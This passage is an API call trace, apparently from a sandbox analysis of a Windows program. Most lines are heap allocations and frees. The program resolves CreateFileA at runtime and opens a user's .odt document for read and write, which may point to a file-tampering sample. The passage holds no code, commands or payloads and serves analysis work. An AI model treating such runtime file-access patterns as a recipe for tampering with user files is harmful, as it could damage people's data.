hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0177.958] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.960] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba618 [0177.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba618, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0177.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.961] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0177.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0177.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba618, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0177.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.961] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0177.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0177.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0177.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0177.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0177.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4a) returned 0x923b28 [0177.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt", cchWideChar=74, lpMultiByteStr=0x923b28, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt", lpUsedDefaultChar=0x0) returned 74 [0177.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0177.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.963] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\gvoasfhilqm4y.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0177.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0177.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=74, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x94) returned 0x8feba8 [0177.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=74, lpWideCharStr=0x8feba8, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt") returned 74 [0177.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0177.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0177.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0177.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0177.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0177.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0177.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0177.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0177.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.967] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 